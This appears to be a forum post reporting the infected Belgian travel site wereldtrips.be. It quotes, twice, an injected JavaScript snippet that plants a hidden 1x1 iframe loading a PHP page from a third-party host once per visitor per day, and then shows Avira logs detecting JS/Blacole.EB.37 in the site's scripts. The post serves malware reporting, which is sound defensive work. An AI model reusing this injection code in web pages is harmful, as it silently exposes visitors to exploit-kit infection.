http://wereldtrips.be/

显示全部楼层 · 发表于 2013-9-16 06:30:20

function zzzfff() {
var efc = document.createElement('iframe');
efc.src = 'http://marketingdigitalloyolasevilla.com/qM7nD68T.php';
efc.style.position = 'absolute';
efc.style.border = '0';
efc.style.height = '1px';
efc.style.width = '1px';
efc.style.left = '1px';
efc.style.top = '1px';
if (!document.getElementById('efc')) {
document.write('<div id=\'efc\'></div>');
document.getElementById('efc').appendChild(efc);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) && (name != document.cookie.substring(0, name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
zzzfff();
}
}

复制代码

function zzzfff() {
var ppkwb = document.createElement('iframe');
ppkwb.src = 'http://marketingdigitalloyolasevilla.com/qM7nD68T.php';
ppkwb.style.position = 'absolute';
ppkwb.style.border = '0';
ppkwb.style.height = '1px';
ppkwb.style.width = '1px';
ppkwb.style.left = '1px';
ppkwb.style.top = '1px';
if (!document.getElementById('ppkwb')) {
document.write('<div id=\'ppkwb\'></div>');
document.getElementById('ppkwb').appendChild(ppkwb);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) && (name != document.cookie.substring(0, name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
zzzfff();
}
}

复制代码

Avira

2013/9/16 上午 06:27 [System Scanner] 掃描
   掃描結束 [已完成全部的掃描。]。
   檔案數： 787
   目錄數： 0
   惡意程式碼數： 1
   警告數： 0

2013/9/16 上午 06:27 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\A1VVYTC4\script.loader[1].js'
   包含病毒或有害的程式 'JS/Blacole.EB.37' [virus]
   已採取動作：
   檔案會移動至 '5487996d.qua' 名稱底下的隔離區目錄。.

2013/9/16 上午 06:26 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\BM0NVITH\wereldtrips_be[1].htm'
   包含病毒或有害的程式 'JS/Blacole.EB.37' [virus]
   已採取動作：
   發生錯誤，檔案未刪除。錯誤識別碼：26003.
   檔案無法刪除！.
   嘗試使用 ARK 程式庫執行動作。.
   檔案會移動至 '1d0fd6cc.qua' 名稱底下的隔離區目錄。.

2013/9/16 上午 06:26 [System Scanner] 掃描
   掃描結束 [已完成全部的掃描。]。
   檔案數： 777
   目錄數： 0
   惡意程式碼數： 2
   警告數： 0

2013/9/16 上午 06:26 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\GP9UHU8J\cpaint2.inc.compressed[1].js'
   包含病毒或有害的程式 'JS/Blacole.EB.37' [virus]
   已採取動作：
   檔案會移動至 '57f89870.qua' 名稱底下的隔離區目錄。.

2013/9/16 上午 06:26 [Web Protection] 發現惡意程式碼
   從 URL "http://wereldtrips.be/libraries/ajax.functions.js" 存取資料時，
   發現病毒或有害的程式 'JS/Blacole.EB.37' [virus]。
   已採取動作：封鎖的檔案

2013/9/16 上午 06:26 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\A1VVYTC4\script.loader[1].js 中
   偵測到病毒或有害的程式 'JS/Blacole.EB.37 [virus]'
   執行的動作：傳輸至掃描程式

2013/9/16 上午 06:26 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\A1VVYTC4\script.loader[1].js 中
   偵測到病毒或有害的程式 'JS/Blacole.EB.37 [virus]'
   執行的動作：拒絕存取

2013/9/16 上午 06:26 [Web Protection] 發現惡意程式碼
   從 URL "http://wereldtrips.be/libraries/script.loader.php?load=init" 存取資料時，
   發現病毒或有害的程式 'JS/Blacole.EB.37' [virus]。
   已採取動作：已略過

2013/9/16 上午 06:26 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\GP9UHU8J\cpaint2.inc.compressed[1].js 中
   偵測到病毒或有害的程式 'JS/Blacole.EB.37 [virus]'
   執行的動作：傳輸至掃描程式

2013/9/16 上午 06:26 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\BM0NVITH\wereldtrips_be[1].htm 中
   偵測到病毒或有害的程式 'JS/Blacole.EB.37 [virus]'
   執行的動作：傳輸至掃描程式

2013/9/16 上午 06:26 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\GP9UHU8J\cpaint2.inc.compressed[1].js 中
   偵測到病毒或有害的程式 'JS/Blacole.EB.37 [virus]'
   執行的動作：拒絕存取

2013/9/16 上午 06:26 [Web Protection] 發現惡意程式碼
   從 URL "http://wereldtrips.be/libraries/cpaint2.inc.compressed.js" 存取資料時，
   發現病毒或有害的程式 'JS/Blacole.EB.37' [virus]。
   已採取動作：已略過

2013/9/16 上午 06:26 [Web Protection] 發現惡意程式碼
   從 URL "http://wereldtrips.be/" 存取資料時，
   發現病毒或有害的程式 'JS/Blacole.EB.37' [virus]。
   已採取動作：已略過

[已鉴定] http://wereldtrips.be/